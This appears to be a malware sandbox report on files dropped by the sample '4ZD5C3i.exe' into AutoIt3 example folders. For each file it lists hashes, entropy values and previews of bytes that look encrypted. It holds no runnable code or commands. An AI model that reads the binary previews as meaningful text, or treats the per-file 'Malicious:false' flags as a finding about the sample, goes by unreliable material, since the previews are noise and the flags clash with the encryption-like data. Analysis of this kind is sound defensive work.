                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):760
                                                                                                                                                                                                                                                Entropy (8bit):7.7096091763179375
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:9GWcZocE3xEv8KjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZLaKSn:k9ZoV3iv8KjmJrc0YXUZtwsTvC
                                                                                                                                                                                                                                                MD5:91DEB4AFC7613C3B7F0CE4C6987E2AD6
                                                                                                                                                                                                                                                SHA1:AED8E3EA294BBBD5CD237337F5FC008B9043C40E
                                                                                                                                                                                                                                                SHA-256:7B6E9A7CB80F78D4BF2B7A1D6769A94EF319218DB0303B906DD2318C306968EA
                                                                                                                                                                                                                                                SHA-512:2EE542E52F2E3DB0BDBF5487430C1676F9FBF6916A537098798949692D3A1490FCD97BA65EC856017F89D052230FE311EC855432D3E055F0E2CAFF338D98B04C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..'Y.R2M.......H....n.}_.#1f.h.?.y.bW\.S...<.$^....n...b...&,12...@fS......(t.kt_Zz.tz.h......F.-=.....v...j..c.V".Bn.4........6.[Y...&.vsSJ.^....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$........b.N.xB..D..V.....9YJ2..}n9......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorGetRGB.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):895
                                                                                                                                                                                                                                                Entropy (8bit):7.766668139489908
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:2fhU7gFRepsOkZXnw0Qe+fiThFbNerDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJu9:sCKGsBnw7chYjmJrc0YXUZtwsTOCa
                                                                                                                                                                                                                                                MD5:4574245068839FEF68F1DD123D841B32
                                                                                                                                                                                                                                                SHA1:1129715C8872E4918A1934E467908DF0F2D264C5
                                                                                                                                                                                                                                                SHA-256:E6F788C750DB6B3FAAC45A9B180F478552F83E054AC10E948FFC2E248C89E180
                                                                                                                                                                                                                                                SHA-512:C17C2745F569B22BFC3D449CE8784E27269C3409E6E7AD05920EE88F570532862A6C008B9FF5348A2CD7C526BE559BF699144026CD1E47745084C42D5943503D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.8@..`..p.v=..K......_....H...yw.m.g`...tq...O.b.*.>95.\J'.........Z.T{.... \m.....E.&..*+....).B..w...]...........F*..T..@....k...D..>R....x...X..nJ._.Eu.P`....."}(.H>1...Wj....l.......z<.b...W..W,..]...p.:w8\u....$../.8.@..;RB...i..dw(..C..5..j.R?....q........!.:D.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....=...e.IF.kV..lz..-.U#.Q..R".uy.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorGetRed.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):754
                                                                                                                                                                                                                                                Entropy (8bit):7.713611176485787
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:UkueVFQptkL1jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZohkku:pueVQuL1jmJrc0YXUZtwsTkhc
                                                                                                                                                                                                                                                MD5:4337BA1402361A99B2EA88E203D9A53A
                                                                                                                                                                                                                                                SHA1:77CFC03ECFB77876C2B19EA8D8FF12C70D7A0E64
                                                                                                                                                                                                                                                SHA-256:BC9A7A2359DAF303A93B38D87B1DBCD04C9CB4318C6D4947AF202CFE6E4FE8F9
                                                                                                                                                                                                                                                SHA-512:D00153169CFD9DC4C8AA4F959F89FE6549A48D4645E297EBFB40AA8728F28A8E1D8DD6F49FB14F0D3524AC5E0DDE48E6CB44655B3CB4BC437AC24AFC2A48101D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..~"X.Wz.H....Ao...~.../.].u.#...uX..l....|Y..h5:..".....s]5.$.X.r......Q..b....'....`...Uz.fc.........`aH....[x..L3.....%......1.....(.F...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..5...K..]@..S.rHGKk...<.zS.u..J.W.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorSetCOLORREF.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):921
                                                                                                                                                                                                                                                Entropy (8bit):7.764815705339625
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:BgqY03md9SyqlMNsgxOgkPyVMV0yjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qc:Bbmd9DWMPkPIMKyjmJrc0YXUZtwsT2U
                                                                                                                                                                                                                                                MD5:917C7E0F54B49BA46E8C8EFF04FABA16
                                                                                                                                                                                                                                                SHA1:7FCBCE0A936746C87712D351E9174A01260BF188
                                                                                                                                                                                                                                                SHA-256:15030BFD7A934B46130A84B8629B0BD22A577828B9074CBB963BB6B37758FE44
                                                                                                                                                                                                                                                SHA-512:EC752194810A1E389D6FF467343313B39A040EAC0F06E07DD96CEC6649F68015A25633A448BA966F0ABD4B566AE0034693E6CECD9E05B65E25597DE2EF497075
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:i.......a.o.Y.OH#..A.....f.../.H[.....S...J^H.."..c...B..{g.SC...S..y...G..Ufd.:..c. .j..,...Hf...X.....>.pX(.....Y+.....;y.C{H...k.1......!._Uf-.Z...S...T..!k.`.....|5vW.R.....O.-.*..}Zv..5..t...i....@..kf.....,.=.....#&.5.@*.b..a.kj+|7.%..y.mC-.......|.7..:...<...R....:J.SY,3......F.Zchf...o.<.IN.@..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..h.;..a..x..i....1).C*R.A.i..T.k...9...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorSetRGB.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                Entropy (8bit):7.7702987265638335
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:aIMI5JkRq818DC/2AhJ4WU9jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvso:3r5ugTDCpf4F9jmJrc0YXUZtwsTAO/
                                                                                                                                                                                                                                                MD5:44E0B7577BEB733A5C544B23AE232F0D
                                                                                                                                                                                                                                                SHA1:A2D95F343220D746154AD34B66381EEBBF1CF4BE
                                                                                                                                                                                                                                                SHA-256:E8279C58EBEF49152C4262E9499CA4196934D1E0C603C179EDA5DEE52F395B1E
                                                                                                                                                                                                                                                SHA-512:D52C143FD6340DF0D12D9B87D706ED30260D7D858B6A1D7FA9E810CAD15A6BE02D9CB56F7988DB45378F615559F2CAB9AF900CCF5D5C99056CCE8ECC03C5AC25
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:./.......+VGy.d.[._..O...u..R.a.+......Z....S:M.X.....6....~...7...V.DI..]#_.t.K}.....B#...q5%y`lpVgtv......r..G./..<@*.i.}'....f2..H....h2!~..+.V.r...Wv...&...j........W.EJMK..........IyB.6...~<e..t..!&b...eB.1...s3....$.p...|....'78c[g..WQqt._jV.;.,".7.}(.........l.8.....:'.....<.i.!....y.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..>.coxA...8..D`...`j..7s.V#dX.......1...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_DecryptFile.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4419
                                                                                                                                                                                                                                                Entropy (8bit):7.9525047398299895
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:m8q3l8ePpeyJMKgG0P/lBVRmkCP4aM1gXXdguUWzdPpHLgYj7WleE:m8q3GeRDr03lQ+aMEXdbUEdPpHL5WUE
                                                                                                                                                                                                                                                MD5:662AEEDADF3F66BDE4BF8FBAF73EC685
                                                                                                                                                                                                                                                SHA1:9449BDB5E5C2548342D86B5A7EDBCDA221084B64
                                                                                                                                                                                                                                                SHA-256:C6A7CEBA272892D51C3C9FEDC2DE366FEB425ABBCE4F89ED95FBB7E6E048EA8B
                                                                                                                                                                                                                                                SHA-512:96404264DB3ACF7AC34718460D5F18DE624255ED12D5D54AE1EFA57847EB29B99D0DF6B937D7C478D23184DF9046924BFC4DA3343A4717FD0539967CA24199B8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:l#......Z...Z....~-6...zL..ja..=...$.!.J....u.%f..c.... ........G.}..L...s.%Tg.I<...[.tM=z._?.a...f.R}.2.B.v.A7q~. BX._....h.......4.6\.M......PD.$.....T.....VG.E..@.p....i.~.....y^.R.n..U.O~...{xS.'5....k....._w.....7.........^....G,!D...5[c..Z.Y./9.N.4..f .r?......6.,.u\......)H..,..=.*d=4m..)T..J....E[s.W...f[Zs..p1Yj6...."u.&s.. 8.)lR.#D=6.....W.>e......YC....dJ.....HvZX.}{..3.U.4...X.."..1...Q.-....`...n......>?MH.JFV....@..x..@.......1h..aQXD....L...f.....K..S.}..t..~.....\..v.....Q$.Cv .....r.A...e.<.].....l.=.)....O._.......5!...R..7.@...s.Y.......G....e.y=..N...e.O....6=...'3.....-....0D.o.^.,...._>.>x.P..~Ai...mw.|;.Cn.......E.j....P...+|c...o.lx.x..d.mE...2d>;|*.Pg.....0n.Y.mz.4)......H.n..y.V.g.g..5..[.a.D.1.V..R....A....;o...w,.;)..........{..PH..7..d<.o...1.?.-.O....U3.a.r......]....l.}...!...\LX.h.m....L.........s.3.D..o............$.[y..y...k.:..Mx=.9...._.........vY-s.;Ct'.k.7..Z. .R.*-...!25|.r..0...|.Kj.>v...i..^...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_DeriveKey.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1258
                                                                                                                                                                                                                                                Entropy (8bit):7.820442643879469
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:4r5do8vLbim+DT8VL0OKjjlb6nEMzroGq0HKVAjmJrc0YXUZtwsT9cpic:c5do8firwVYLJ6EE5q0HP4o0jZtweIH
                                                                                                                                                                                                                                                MD5:D13163B0AC3F7E83AB496B16BE2107A9
                                                                                                                                                                                                                                                SHA1:11173800AB8077A90F3243F719369E65D6231705
                                                                                                                                                                                                                                                SHA-256:410613DBBEFD13E9A91991426604F75B1E49B62718F9534CC85A4B07AEA7A4CC
                                                                                                                                                                                                                                                SHA-512:25B6ACA62BC1DDF08AD9609011AED9E790AD3F24549585966CF85052C7D8BAC9F553317470DCA031F44B8EE9549687D6C1441EBB863D3747FE9DFCAF711A649D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....B....O.QY...G.\.-.[,+.\$..R....;....N....,*.M..E2.J...n......?G\R=..v.#M......Q....m...M.og7.zNx.Po.P...Io..w..w...?...q..).1D.4l..J6.q..3'9....g.............vu.~....h.^u......N.3.c..t.....4d.....C#6....C.S.v....r3.dC/..8Wc0h..(WQz........t[.<.C.........|6*n..1q.a..2.=Hq.....>@{L_.g..j.....G-;.,.qh..(....KW..s..}.ac#.X.<.,..2."NH,.T..%..b..T.E3[...N.......h.o.8..m.7.kA.d%d.rt..c.]6-.......G%^..;T...|.#....\m..h;$.q.I.\..B4>..a-..h~........V9d..>........x.d}iAx.....B.34.._.....^..jDV..[\P.`.6:.'.F...._..v.;w.n....O..lY...'/........Y.<...r.H.=Fv..~..l..7..:(.....XE.N.;...Uk<{....T...3m.........C.%L.YS.....8...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_EncryptData.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4300
                                                                                                                                                                                                                                                Entropy (8bit):7.955585134623527
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:ZdcB/5wC6T61WAoEDP0NQ6kB2Poh0rXh0WIWvji0A4leh:jM/5wBT614gEQd2Poh+R0b4jiiUh
                                                                                                                                                                                                                                                MD5:223738F9C45A13A97AE06F559DEDFA97
                                                                                                                                                                                                                                                SHA1:59F5595B6B9AF6B76868BF67702AEF6FBC9A0382
                                                                                                                                                                                                                                                SHA-256:BA043D5D349CD0F8734C58DE7C98B653878E189625A1E3FB463FD20DFB507875
                                                                                                                                                                                                                                                SHA-512:39ACF773734627A5477774CA0DA411E773606ACB5E9D06C2023B4B141E715D509C7AE75D6BE78777E83F0EB7D200EEC94461FC7FCEF178A58FB45887E6224C52
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:T.....`.E.|+M.x.q...T...5..`.cM..X....`.......Q..L#.U......_8..2....W.(L).=.0..jy.ci.Q..A.T.A.....HkN4.A.}C.jl..F.M}..!..`...LF..u.[..@=....7.\P....{.H....=.... ...J...l....'....iQ....O?...........1..aS..]...L..7...|k.....0.+...*F...iB...z........wQ...f.d.K.....? ....!#...?..k..E......<..M.FG8$6B8.]..}.8f...Me ..J..A...A..?2..[...0m.d...........W..y...f.*....j8K0.Nt.?.....Nr.t.j G...M...z.. .x>.~D........a........t....}..P!65.g."...J.|2.....~.%....p=.."-z=x$~9L.....U.C#............5... .....`.b{\6.UK....M..w:.HycW.k.w....~.S..}XseVr..pf.e...Z&....Kg....s...F.{...>v...F.j..ux.a,Z>...y..X6~..[.2.A...........%..b;....)*......S]....K.=xL..&YV...D..#..Jf;u....Y.<.,.!L'.......s.ip......<..........E.A.........W.D..77..n...5Tq..<..qv.PK....$S.y.....DQ..9.......%.M.6.H..S....I|.5...rS.....3.>...T.7...%.E.u..H<5.%..z.x^..........,p?.O=..R/./a[3.I8.}.*...5vm.cP.:ee.......t..u..Z\7"........<.|..&..T.~....O...y.......DI{i&..X...o,,..k..{fo.!.cg.rG}..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_EncryptData[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1607
                                                                                                                                                                                                                                                Entropy (8bit):7.868615123940727
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:WN9GeuasmttbZAurbHsEdy2x4zqC1aCYUxrVRq3TjmJrc0YXUZtwsTafKlk:/RWmurbHsEs2xBJer3I4o0jZtwvYk
                                                                                                                                                                                                                                                MD5:932CA37219499D301B7BEADBE3A16EC1
                                                                                                                                                                                                                                                SHA1:3234FDDC2F1E3189EF5B41FFCECB21887A3D76F1
                                                                                                                                                                                                                                                SHA-256:8FC6B1AFAED52A9A44E94F20398E54C5E8213195F79D9EB71D182ABFF4882397
                                                                                                                                                                                                                                                SHA-512:233702CDE009E2CC5C00F303F5254D8A546D35BFAD1FF4621D87FE56BCB5F74FAB7C12A4F3106E31A389F294B43589501827896B6E5B3C24F79004B1EE7F9A52
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:J.w8c.+....k.%.~..J/...8n...eR.e..}.f..O..u......O...6s....`.....R...i.~Q.x...<x...w.7..ME>\k.V...^.%.....%Tg..YN...Sw.>.../......Q....2...v....ti...k..Q..k...q-^YQ.t*[c.T..h...@$.0S..j......=.\...7.?W.........p!.=.........8...>...O...]....V.Q.6r%.T.*apn.l-{B$.....6...R.T....g.7..0.j.)....qK.h....y..f.z."..2W.f@..M....g....N'....<.....@#b{..M..#.e...^..|8..q..3....*o..v...O.8..tu...]..Y..g..2..<.q..]G.*..~.......+..'.E..o.yD{4.d..V.6...d...un...9|....R?W....;..G._....K.-.=....K(vr_.QB=^...T..A...HL.p........ .6..w.Y..;.1.>..N......j....TM.Z.a.u...m..C.d...".#...*/.)7v...d..~>......uP..]..Hc...../.......Dz.R.4r...g..#.h.8MtG.W.sO/..l.....|S.Yg.....,.+.S.Wnm....DB..M.Ra.-.W...O8..U+.|Ny......4j.i....D.Ii...\K>._.V.n....f..t..~.S.zq.)........v...r&..{.....<.}.a..tl...!.Ql..\Yb...@yO..........Z..z...]... _..E..z}...7<.....&'..P.<@...SmD..v.+Wpr..rC4t.]Hi.D....S,.;.4...E....I.{......+h@....~v.4B%.39...".f...A|..5@1P...+R^.=.i.P......F.p.up9.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_EncryptData[3].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1852
                                                                                                                                                                                                                                                Entropy (8bit):7.877399178435586
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:rtASO7oMCtDLgkavI6SRvrvxpk6dG/TL3LXbXEIRxtW8yjmJrc0YXUZtwsTvgS:rt/GmDhy2vTDk6dGrb1RW884o0jZtwmN
                                                                                                                                                                                                                                                MD5:8CDE02FE85593CF4827AA31DBED37D12
                                                                                                                                                                                                                                                SHA1:CC688B5B4F16CFF1ABDC25A0BBC5E35BDE8029F3
                                                                                                                                                                                                                                                SHA-256:641DF85FAC5B51D86B482F7D0419EE29AB629041875423C7A27A86C830447404
                                                                                                                                                                                                                                                SHA-512:C89F7847918499BBF2A2369D2E6C654CC4D0FA13521E0BE7CA6C5A884B9F2798BA2E58A7BBF0DFB633C1CC0F466353E1C740135D7A31539086C8B5AA1DD744C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...:...ok.d_.._......!~;..-.V.)...=['.^-..UL.=. ...#.'"......*.7...}.,.<t.m.....<.#..)..(d....q..JW....8.<k..0...4...&a.r..St..m..?...X.h.`.DUWP....../.g..r...5.@...l*=l.[$.".............m._8...........>.M..[....1...%....g.f.6..p5..7q.=..).].@......0.8N....%....vq.R\>t..R.p.......k..&.xG..j.Y.F........}i..X..f..$vM.x...C... .....p...T..Q.c..2.&...q...V....L...P..Q...L.+.%95...c1.t.....0.:...Q(...{".....D.=...J.5...k.4.NEU......?..j...x!.c.]..v/.Y..a..:...E.T...E...c..{...^5'.n-4Z- B.9@..(<eb.Z.n.HSq.v...@^....{..>..{....`e....}..>. N..L.GT..#!.......G7.4s.].k..#.y6'...oOt.Q..$..F..k...zXL.....o.1{..*M}...A.Q.......t2.mk.....e..D..0.l....w2-.....#_.}A|..|h...,.8.).L......P..#...n.....N....*..`.....&ip..6......,3....I..).fQ.,.6.fW..1..!g.6]..*~.7>..v1/ ...#^..Y.Z.."Y+.J.c..Y.q`....O..v.2kHJI....kc.N..f.q.....s...t.%.1>..`.l...-.1..k.e..p)i.....>!6.j.........!G~./..~..=9|.(..P.xr...[.I.,...U.g\.$.....S.W..L~........IvD.;5.o.zS.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_EncryptFile.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4419
                                                                                                                                                                                                                                                Entropy (8bit):7.956131476849327
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:iFljso3G3beU9dgtZuffAe1DrlcXG+dqXsTqFNLzll1mxoTles:iF9so3Xydv9lcXG+qseFZ5lwxSUs
                                                                                                                                                                                                                                                MD5:2C905D50D0F5382644999A78DBA5E821
                                                                                                                                                                                                                                                SHA1:7C3B76B4DC1C9D5245C36DBBE7B6A3C910A2900A
                                                                                                                                                                                                                                                SHA-256:1898DC7D3A856CE0046D68668B4BB4348221B650FFF2FF9BE70592696B25C105
                                                                                                                                                                                                                                                SHA-512:615C90D96BC50537317D86A2A72442E8272243A09A6C6D2E08F418D8881B5D5CA3E8F79FE200368F5433E64D2CB85DDD8FB96DFD2FFC2653D69CA11D6E6F3CEB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......M."........;.\.z?:..9.P..b......il4T_.6.~....1...Wj...]..-J....l.....}%....*U=.wqBVB5H]...7V6@..C.clb...)......X.......o.P..x.....te...f.t...:..^.....Cs.$....p..(.....:.[|9..7...XLNax...>.{.S-.d.U.B...kf%...UT...BW.pBY}*Z...'O....7Z?..[.Aw.7I.E..g..8k.....KfE.^..w..6.!3`TW.O.....=.~B.`.eP..>...g.%]Ue....\'X.4...g[... `.....E.l..?3.._.lj..(....u......?..1.cu..-EL*tW..A...'%.0>..[Pf.g\......jY.hOO.........]....1p.T..G.}.....T9TT.nr....uG..Y2..`X.k...].N........w....v..#r.%Q..ZC.Bn..V'.'T.0..f.TBz._.M.....(....`.8..4..../....c...V.....Z4....=.X.~T...b~u..WZ.~. .....3{]1))7-:..}.N:T8.C.E.>..E.......P...,.rN..y...x..1.d/0ddT....K.....c.m...i.O..Q]a.zFs..k.V.K...k..>.8p.....9...i4...(...aYP.E.L.......>.^......u....Y.2..]..I.}.H7.}$.......(...............M}z.l....C.....s.?..b.Z.......g......B....t.. YYov.....&.k..2#........>.yp.ZI..X.9.c......r-yT.....j......a....Z.q..k.U..x....M.U....-.h....xk..&..L.a.5..d.....YI....P......*...(.n..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Crypt_GenRandom.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):922
                                                                                                                                                                                                                                                Entropy (8bit):7.742248858169269
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:hqFCORaMm0+ZLs1b8tDjmJrc0YXUZtwsT+fC:hqwFxVsR84o0jZtwbK
                                                                                                                                                                                                                                                MD5:E3A260C226544B01072CF46F6621FB16
                                                                                                                                                                                                                                                SHA1:2D25B2A5D127F8449672F267FBC49D5A6C9378E9
                                                                                                                                                                                                                                                SHA-256:C82858EBE70325971F91905DB538B4972BCA1357FFBBA53CAB37E32027D6376A
                                                                                                                                                                                                                                                SHA-512:A9EC4C75651BE801413A8CCB6A8D90BDCEC6BCA1BF7CD26A8F2D8D2BD165593FD437E0339CE455D5D53CE0CEDB08BF0060AEBF1EB83E1EE368E7FD88F6FE3AF3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
